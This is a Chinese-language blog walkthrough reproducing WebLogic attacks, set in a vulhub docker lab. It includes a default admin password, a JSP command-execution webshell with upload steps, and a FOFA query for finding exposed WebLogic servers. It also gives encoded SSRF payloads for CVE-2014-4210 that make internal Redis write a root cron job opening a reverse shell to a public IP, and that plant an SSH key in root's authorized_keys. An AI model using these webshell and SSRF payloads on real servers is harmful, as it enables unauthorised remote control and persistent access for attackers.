漏洞复现 - - - Weblogic漏洞(一)
目录
一,Weblogic简介
二,Weblogic漏洞环境搭建
三,Weblogic弱口令
四,CVE-2014-4210
漏洞环境
漏洞危害
漏洞复现
进行内网存活探测
一,Weblogic简介
WebLogic是美国Oracle公司出品的一个application server,确切的说是一个基于JAVAEE架构的中间件,WebLogic是用于开发、集成、部署和管理大型分布式Web应用、网络应用和数据库应用的Java应用服务器。将Java的动态功能和Java Enterprise标准的安全性引入大型网络应用的开发、集成、部署和管理之中。 WebLogic是美商Oracle的主要产品之一,是并购BEA得来。是商业市场上主要的Java(J2EE)应用服务器软件(application server)之一,是世界上第一个成功商业化的J2EE应用服务器, 已推出到12c(12.2.1.4) 版。而此产品也延伸出WebLogic Portal,WebLogic Integration等企业用的中间件(但当下Oracle主要以Fusion Middleware融合中间件来取代这些WebLogic Server之外的企业包),以及OEPE(Oracle Enterprise Pack for Eclipse)开发工具。
二,Weblogic漏洞环境搭建
docker pull vulhub/weblogic:10.3.6.0-2017
docker run -dit -p 7001:7001 vulhub/weblogic:10.3.6.0-2017
访问:http://kali IP://7001/console
三,Weblogic弱口令
账号:weblogic密码:Oracle@123
有了管理员账户我们就要想办法上传一个war包,下面是一个jsp格式(主要此jsp不可用蚁剑连接,可以自己用蚁剑生成一个war包,然后安装下列步骤上传)
<%@ page import="java.io.*" %> <% String cmd = request.getParameter("cmd"); String output = ""; if(cmd != null) { String s = null; try { Process p = Runtime.getRuntime().exec(cmd); BufferedReader sI = new BufferedReader(new InputStreamReader(p.getInputStream()));
while((s = sI.readLine()) != null) { output += s +"\r\n"; } }
catch(IOException e) { e.printStackTrace(); } }
out.println(output);%>
对jsp进行war包打包
jar -cvf cmd.war cmd.jsp
下面开始教大家在哪上传war包,如图所示
点击浏览上传war包,点击下一步
如同就是war包的路径
访问如下路径可以获得getshell
http://kali IP://7001/cmd/cmd.jsp?cmd=ls
查看cmd就可以看到文件路径
四,CVE-2014-4210
漏洞环境
FOFA搜app="Weblogic_interface_7001"
漏洞危害
漏洞复现
http://your-IP:7001/uddiexplorer/SearchPublicRegistries.jsp
进行内网存活探测
http://your-IP:7001/uddiexplorer/SearchPublicRegistries.jsp?rdoSearch=name
使用max hackber,发送post请求
&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search&operator=http://your-IP:9090
当 http 端口存活的时候就会显示 404 not found
尝试一个不存活的主机就是 No route to host
探测6379端口
SSRF攻击内网Redis
写定时任务
/uddiexplorer/SearchPublicRegistries.jsp?
operator=http://172.18.0.1:6379/test%0D%0A%0D%0Aset%20x%20%22%5Cn%5Cn%5Cn%5Cn*%2F1%20*%20*%20*%20*%20%2Fbin%2Fbash%20-i%20>%26%20%2Fdev%2Ftcp%2F47.101.214.85%2F1234%200>%261%5Cn%5Cn%5Cn%5Cn%22%0D%0Aconfig%20set%20dir%20%2Fvar%2Fspool%2Fcron%2Fcrontabs%2F%0D%0Aconfig%20set%20dbfilename%20root%0D%0Asave%0D%0A%0D%0Aaaa&rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search
写SSH公钥
/uddiexplorer/SearchPublicRegistries.jsp?
operator=http://172.18.0.1:6379/test%0D%0A%0D%0Aset%20xx%20%22%5Cn%5Cn%5Cn%5Cnsshrsa%20AAAAB3NzaC1yc2EAAAADAQABAAABAQDV14i/SITCBQjzb%2B8xL0vwGwKjnMEQiarTxdVokFToK0Xw99m0eJwKV3WcTQgSykHA2rFxbQw%2Fv9IVx89bAzX0iOBAU8jF%2B9oH5KE9KBzM%2FT1Vr3DDwmNny2qYCfizO9jJ90fr3DUeXWwl%2BD24XiKfkDzlDly9LgEYxXl%2FCIgZ91QcTA0UeSBLXCgigVLKhDNZGGBqMFrGNUsj0esNJr7pJsYEnIn%2BN5BtnUWEce1KERlGDiwvzRpyFvOKgQpEAiS%2BR781GSsAsJsCQz8OFge6lx0iSMNZ6TWjkQYKlnTkQvzOo%2FZhINtItYziRXJKmNQLdPpQ7OYo2WOQ4TIDFtR5%20root@iZuf6jc5pa52ijq06q5f1lZ%5Cn%5Cn%5Cn%5Cn%22%0D%0Aconfig%20set%20dir%20%2Froot%2F.ssh%0D%0Aconfig%20set%20dbfilename%20authorized_keys%0D%0Asave%0D%0A%0D%0Aaaa&rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business%2Blocation&btnSubmit=Search
漏洞复现 - - - Weblogic漏洞(一)相关推荐
- cms漏洞复现-越权漏洞
cms漏洞复现-越权漏洞 注册一个用户001,并登录上去,打开bp抓包,点击会员空间 关注到如下cookie中两个值,将dedeuserid--ckmd5的值用last_vid_ckmd5的值来进行替 ...
- 漏洞复现—Weblogic CVE-2017-10271/CVE-2018-2628/CVE-2018-2894/CVE-2020-14882/ssrf/weak_password
Weblogic CVE-2017-10271/CVE-2018-2628/CVE-2018-2894/CVE-2020-14882/ssrf/weak_password 基础知识 漏洞原理 涉及版本 ...
- [漏洞复现]CVE-2021-26855 漏洞复现及Exchange邮箱详细安装过程
CVE-2021-26855 漏洞复现及Exchange邮箱详细安装过程 一.介绍 Exchange Server 是微软公司的一套电子邮件服务组件,是个消息与协作系统.2021年03月3日,微软官方 ...
- 漏洞复现-webmin漏洞系列分析与利用
webmin漏洞系列分析与利用 Webmin 远程代码执行CVE-2022-0824 编号CVE编号:CVE-2022-0824 影响版本 漏洞简介 复现 拉取漏洞镜像 启动漏洞环境 解决方案 POC ...
- java 漏洞复现_CVE-2019-12384漏洞分析及复现
原标题:CVE-2019-12384漏洞分析及复现 *本文中涉及到的相关漏洞已报送厂商并得到修复,本文仅限技术研究与讨论,严禁用于非法用途,否则产生的一切后果自行承担. 引言 近期关于Jackson的 ...
- Weblogic历史漏洞复现
Weblogic WebLogic是美国Oracle公司出品的一个applicationserver,确切的说是一个基于JAVAEE架构的中间件,WebLogic是用于开发.集成.部署和管理大型分布式 ...
- weblogic漏洞复现
weblogic 漏洞复现 Weblogic ssrf https://www.hetianlab.com/expc.do?ec=ECID9d6c0ca797abec20170210143122000 ...
- [Vulhub] Weblogic 漏洞复现
文章目录 Weblogic 常规渗透测试环境 0x00 测试环境 0x01 弱口令 0x02 任意文件读取漏洞的利用 0x03 后台上传webshell Weblogic WLS Core Compo ...
- Weblogic漏洞利用总结
所有文章,仅供安全研究与学习之用,后果自负! weblogic 一.weblogic 反序列化(CVE-2020-2883) 0x01 漏洞描述 0x02 影响范围 0x03 漏洞利用 0x04 漏洞 ...
最新文章
- Linux LVM 的使用详解
- VTK:饼形图用法实战
- 【Mybatis】sqlSessionTemplate.getConnection() 遇到 java.sql.SQLException: Connection is closed
- c++ 数组 结构体
- .net3.5下的Socket通信框架
- Ubuntu中虚拟环境的搭建
- 基于FPGA实现DAC8811接口(正弦波)
- 一次有趣的面试经历,当前端面试碰到后端面试官会发生什么?
- 2021特斯拉Model3/ModelY维修手册电路图接线图用户手册资料含国产进口车型
- Qualcomm Ramdump debugging
- 计算机硬盘找不到,电脑找不到硬盘怎么办
- 论文阅读:Social Media and Fake News in the 2016 Election
- 2020-08-26 笔记的风格和措辞
- 情人节程序员用HTML网页表白【3D旋转木马相册】 HTML5七夕情人节表白网页源码 HTML+CSS+JavaScript
- 11-20什么是内网,外网,局域网,如何判断
- HDU 5643 King's Game 打表
- CSS字体、行高等其他样式
- LeetCode:1219.黄金矿工(Java语言)
- MA35D1记录1-源码编译
- python将html转换为pdf,如何使用Python将HTML转换为PDF